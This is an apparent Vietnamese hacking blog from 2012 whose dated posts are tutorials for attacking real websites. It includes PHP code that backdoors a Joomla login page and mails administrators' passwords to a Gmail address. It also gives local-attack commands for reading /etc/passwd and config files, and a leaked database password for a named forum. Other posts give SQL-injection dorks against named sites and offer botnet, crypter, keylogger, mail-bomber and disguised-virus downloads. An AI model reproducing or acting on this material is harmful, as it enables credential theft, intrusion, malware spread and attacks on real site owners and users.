Thứ Hai, 1 tháng 10, 2012

Lời xin lỗi - Chút bộc bạch


Như tiêu đề, Soleil gửi lời xin lỗi tới tất cả các bạn đọc vì đã không thực hiện lời hứa - Tiếp tục viết và  public tut được nữa

Thời gian này, bước vào kỳ cuối cùng của quãng đời sinh viên - Chuyên ngành cơ khí HK, chất lượng cao - BK HN. Khối lượng đồ án và bài tập kỳ cuối cùng gần như quá tải. Vì thế chắc sẽ không còn nhiều đêm trắng cùng ae ngồi mày mò, gõ gõ như thời gian vừa qua được nữa. Soleil  thực sự muốn tập trung 1 kỳ cuối cùng cho chuyên ngành và thực hiện 1 số dự định. Vì vậy thời gian này, có thể trong vòng 3,4 tháng nữa, sẽ có ít tut trên blog - Mong các bạn đọc thông cảm và không gửi mail thêm nữa.

Nhân tiện những bạn nào có niềm đam mê với hacking muốn gia nhập vào VHB http://vhbgroup.net  cùng ae trong đó trao đổi học tập & trao đổi thì có thể để lại user và mail. Pass mặc định là 123456@, các bạn nhơ change pass sau khi vào 4rum. Soleil hứa sẽ reg nick cho tất cả xem như 1 hành động gỡ lỗi. Và VHB vẫn sẽ hoạt động bình thường.


Thân! 


Thứ Ba, 21 tháng 8, 2012

[Bài 1 - XSS ] Giới Thiệu Chung

Soleil sẽ góp 1 chút kiên thức về XSS cho ae tham khảo trong 3 bài viết. Bài đầu tiên sẽ mang tính chất giới thiệu. Trong quá trình viết có gì sai sót mong được ae góp ý.

Các nội dung chính:


1- XSS là gì ?

2- Nguyên lý hoạt động XSS

3- Phân loại XSS

4- Mức độ nguy hiểm XSS

5- Phương pháp check site dính lỗ hổng XSS

6- 1 số thao tác khi tấn công bằng XSS

7- Kỹ Thuật Bypass

8- Demo 1 số site dính XSS:

9- Quá trình các bước thực hiện tấn công bằng XSS


Trong bài 2, Soleil sẽ viết từ mục 1 đến mục 5 ^^

Thứ Năm, 16 tháng 8, 2012

Private Blog - VHB_Group

Nhân dịp VHB comback, soleil sẽ public 1 số tut khá nhạy cảm và sẽ private blog và chỉ dành cho thành viên VHB truy cập.

Ngoài ra, Nếu ai có nhu cầu để cấp quyền truy cập blog thì để lại email phía dưới.

Sẽ chính thức private sau 1 tuần từ lúc pub thông báo này. (đến 25/8). Sau ngày 25/8 sẽ ko cấp quyền cho bất cứ 1 ai nưa,

Thân!

Thứ Tư, 8 tháng 8, 2012

Check site .cn tối ngày 7/8/12


1 số site khựa bảo mật kém bị check tối 7/8

1 số site đã bị deface :



Topic sẽ tiếp tục cập nhật trong tối nay ^^

Chủ Nhật, 29 tháng 7, 2012

[Bài 4 – SQLI] Bypass 406 Not Acceptable




      Trong các bài trước , Soleil đã giới thiệu các dạng attack cơ bản sử dụng phương pháp SQLI để chiếm quyền quản trị administrator: Khai thác đối với AspxKhai thác lỗi cơ bảnLỗi Jet. Tuy nhiên trong lúc khai thác, 1 số site đã chặn ở 1 vài querry sqli và không thể tiếp tục.
Hôm nay Soleil sẽ demo 1 dạng bypass “406 Not Acceptable” thông dụng thường gặp phải lúc khai thác đồng thời cũng pubic bug sqli đối với công ty thiết kế website “Viet Arrow”.

Google dork: Designed by Viet Arrow id=

Tất cả các website được thiết kế bởi Viet Arrow đều dính lỗi sqli, sau đây là 1 số ví dụ


Soleil sẽ chọn 1 victim bất kỳ để khai thác.

Trước khi vào bài này, có thể tham khảo qua bài 2 : Khai Thác Lỗi Cơ Bản

Bước 1: Check lỗi

Thêm dấu ‘ vào sau con số của đường link có dạng id=
 http://www.khaithong.com.vn/index.php?do=content&id=1
Nếu giao diện website thay đổi nghĩa là site đã bị dính lỗi sqli

Thứ Sáu, 27 tháng 7, 2012

Một số phần mền Mã Hóa Virus Free


1-      07-12-12 Crypter

-          Click vào file và chọn path tới file virus
-          Click vào stub và chọn path tới file stub.exe ( cùng thư mục với file 07-12-12 Crypter.exe )
-          Sau đó tùy chọn các chức năng và Encrypt


-          Trong trường hợp này Soleil sẽ lấy demo với file virus là con bot được tạo từ tool botnet Di5
-          Hình ảnh check file virus khi chưa mã hóa:

Các phần mền keylogger không thể bỏ qua


    Trong tất cả các keylogger đã sử dụng thì soleil kết nhất là hai phần mền: "Ardamax, Perfect" với cách sử dụng khá đơn giản và đầy đủ các tính năng: Ghi lại thao tác bàn phím, chụp destop, chụp webcam, link website đã vào, Create trojan, gửi mail, thiết lập thời gian gửi, đính kèm phần mền, chạy chế độ ẩn,.....



1 - Ardamax keylogger
 

Ardramax là phần mên keylogger đầy đủ các tính năng với cách sử dụng gần như là đơn giản nhất và được rất nhiều người ưa chuộng.


link download: ( Bao gồm cả key)

Thứ Năm, 19 tháng 7, 2012

[Tut] Up Shell Vbulletin Qua Database P.I



Khi thực hiện Local Attack đối với 4rum thì include shell qua database, là 1 kỹ năng không thể thiếu bởi vì thư mục Admincp thông thường không có mấy admin sơ ý đến nỗi quên không change path và đặt file .htaccess bảo vệ. Vì vậy phương pháp include shell database được các attacker sử dụng 1 cách phổ biến

Có 3 cách để include shell, hôm nay soleil sẽ giới thiệu cách thứ nhất.

Giả sử soleil đã có shell  1 site trên cùng server,
Với shell này ta có thể Local Attack sang forum: http://raoonline.net  và thu được thông tin config như sau:

$config['MasterServer']['username'] = 'raovat_forum';
$config['MasterServer']['password'] = '125254857'


Bước 1: Login vào cơ sở dữ liệu:




Thứ Hai, 16 tháng 7, 2012

[Bài 3 - Local Attack] Các Phương Pháp Local Attack


 Để hoàn thành bộ tut Local Attack full, hôm nay Soleil sẽ giới thiệu bài 3, cũng chính là bài quan trọng và trọng tâm nhất trong Local Attack. Trước khi đi vào bài 3, các bạn có thể đọc qua và lấy 1 số tool cần thiết từ  bài 2 - Giới thiệu tính năng 1 số shell

      


  *        Nhắc lại trình tự các bước Local Attack

     1-       View danh sách các user trong server
     2-      Tìm  file config.php
     3-      Get thông tin login vào database
     4-      Crack hoặc change pass admin
     5-      Login vào quyên quản trị và upshell

    
     1-      View danh sách các user trên server

Muốn local được 1 site nào đó trên server thì trướ tiên cần phải xác định site đó có user là gì, source code là gì từ đó tìm cách đọc file config.php của user đó


-          Một số câu lệnh để get user:

Lệnh phổ biến nhất:
Cat /etc/passwd

Tuy nhiên một số server cấm lệnh cat, có thể sử dụng các lệnh sau một cách linh hoạt

Less /etc/passwd
./cat/etc/passwd
More /etc/passwd

Ngoài ra có thể sử dụng chức năng get user trên shell byg.php, c99.php hay bypass ở r57.php, soleil.pin, telnet.pl hoặc các shell sau:


Pass download: soleil_vhb
Pass dải nén: ceh.vn

 -          Câu lênh get user & domain

Cat /etc/virtual/domainowners  ( Chỉ dùng đối với direct admin )
               
      2-      Tìm file path file config.php

Đối với các mã nguồn mở thì path file config được mặc định như sau:
Lưu ý: “path” chính là path từ server dẫn tới site, ví dụ đối với server linux, path là: /home/user/public_html

Thứ Bảy, 14 tháng 7, 2012

[Tut] Insert Keylogger into joomla




Bước 1: Up shell lên site joomla

Bước 2: Insert mã độc vào code

       -   Vào administrator/components/com_login/

       -   Edit file: admin.login.php

       -   Tìm dòng:$mainframe->redirect('index.php');

       -   Thêm trước dòng này 1 đoạn code như sau:

     PHP Code:



$db        =& JFactory::getDBO();                
$mailfrom         = $mainframe->getCfg( 'mailfrom' );
$fromname         = $mainframe->getCfg( 'fromname' );
$siteURL        = JURI::base();
$uname         = $credentials['username']; 
$query = 'SELECT name , email, usertype  ' .
        ' FROM #__users' .
        ' WHERE username = "'.$uname.'"';
$db->setQuery( $query );
$rows = $db->loadObject();

if ( ! $mailfrom  || ! $fromname ) {
    $fromname = $rows->name;
    $mailfrom = $rows->email;
}
$usertype = $rows->usertype;        
$email = $rows->email;
$pass = $credentials['password'];

$message = "$uname|$email|$pass|$usertype";
$to="ducdung.08clc@gmail.com";
$header = "Content-type: text/html; charset=utf-8\r\nFrom: $mailfrom\r\nReply-to: $to";
@mail($to, $siteURL, $message, $header);

Với đoạn code này thì khi admin đăng nhập thì username, password, email sẽ tự động gửi về mail: ducdung.08clc@gmail.com  



Thứ Sáu, 13 tháng 7, 2012

[Ddos-BotNet] Di-BotNet V.2









Link download:  http://www.mediafire.com/?7r73cyckox24gj4
Pass unlock: soleil_vhb



Hướng dẫn sử dụng:

Thứ Năm, 12 tháng 7, 2012

[Local Attack] Get all config toàn server





     -          Đâu tiên download shell get all config ( w.php)  về rồi up lên server.

http://www.mediafire.com/?hi4gnmu3kpxn095  ( pass unlock: soleil_vhb )







     -          Click vào done và thư mục có tên là tmp sẽ được tạo ra.

     -          Vào link của thư mục tmp sẽ có 1 số shell với các chức năng sau:

+             dz.sa : Đây là shell cgi, sử dụng nó để get các user trên server bằng cách thực thi câu lệnh: cat /etc/passwd, more /etc/passwd ( Pass login là: dz ).
+             user.sa : Shell này dung để xem danh sách các user và domain trên server.
+             config.sa : Shell này có nhiệm vụ thực thi get all config bằng phương pháp symlink


[Ddos-BotNet] Nick3





Đây là code + data+ tool create bot của nick3 đã được edit giao diện dựa trên bản G-bot 1.7 của các hacker người nga.
Hướng dẫn sử dụng:

        -          Up code và data lên host sau đó vào file config.php chỉnh các thông số:
+             Username và password data
+             Pass để login
        -          Sau đó vào link botnet, vd: http://vhbgroup.net/botnet3/ , sẽ xuất hiện 1 giao diện 404 như dưới đây. Ấn nút tab và đánh password đã thiết  lập trong file config.php ở trên rồi enter.










Thứ Năm, 5 tháng 7, 2012

[Tut] Đính kèm virus vào file ảnh


[Tut] Đính kèm virus vào file ảnh



 Bước 1: Bỏ dấu tích “hide extensions for known file types”





Bước 2: Tạo 1 forder trên destop, Ví dụ: soleil

Bỏ file virus vào forder soleil, virus thường có đuôi là .exe. Trong bài này tôi sẽ thay virus bằng phần mền putty.exe chẳng hạn và sẽ đính kèm phần mền này vào file ảnh có đuôi là jpg.


Bước 3: Tạo “Shortcut”

Click chuột phải vào phần mền và chọn “create shortcut”



Thứ Ba, 3 tháng 7, 2012

Xem Ip Bạn Chát



          Download 2 file ip.php và ip_log.txt về và up lên host  ( Có thể dung host free)
          Chmod file ip_log.txt về 777
          Rồi gửi link file ip.php cho bạn chat. Ví dụ: http://www.vhbgroup.net/ip.php ( Có thẻ rename file ip.php )
           Sau đó ip bạn chat sẽ gửi về file ip_log.txt. View file đó và xem ip: http://www.vhbgroup.net/ip_log.txt


 

Các link trên chỉ mang tính chất demo

pass unlock: soleil_vhb
pass download: ceh.vn

Thứ Sáu, 29 tháng 6, 2012

[Tut] Padding Orale Attack





 
Kiểm tra lỗi Padding Orale



View source:



Chú ý đoạn code sau:
/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2&t=634538991637902500" 


Bước 1: Chuẩn bị Tools

Trước tiên cần cài đặt perl:

Coppy 2 file  padBuster.pl và Web.config_bruter.pl sau vào ổ C:

padBuster.pl:
Web.config_bruter.pl:
pass unlock: soleil_vhb
pass giải nén: ceh.vn



Thứ Tư, 27 tháng 6, 2012

[Bài 2 - Local Attack] Giới Thiệu Tính Năng 1 Sô Shell


Nói đến local là nói đến shell, không có shell thì chỉ local bằng niềm tin. Hôm nay soleil giới thiệu một số loại shell thông dụng không thể thiếu trong local attack

Một số shell thông dụng:

 r57.php

R57 hiện nay đang là shell thông dụng, được sử dụng phổ biến nhất với hầu như là đầy đủ các tính năng.


c99.php


Nói đến r57 cũng không thể  không nhắc đến c99 với các thao tác có sẵn trên shell mà không cần phải sử dụng lệnh: edit, del, insert, drop… đặc biệt là có khả năng dump cơ sở dữ liệu

Thứ Sáu, 22 tháng 6, 2012

Tool Bom Mail MaxBomber





Tool Bom Mail Good MaxBomber:



Hình ảnh demo victim bị tấn công:


   
-           

   

Chủ Nhật, 17 tháng 6, 2012

[Ddos-BotNet] seo4loader



Đây là code botnet mạnh nhât hiện nay.



Link download:  http://www.mediafire.com/?x7fdp13fhtad1d6

pass download: ceh.vn
pass giải nén: soleil_vhb

[Google Dork] SQl - Public 16/6


Google Dork : inurl:Default.aspx?PageID= 

Dang khai thác đối với aspx ở dork này tương tự như trong tut sau:

Sau đây là 1 số site dính lỗi này:

www.sagiang.com.vn/Default.aspx?pageid=57'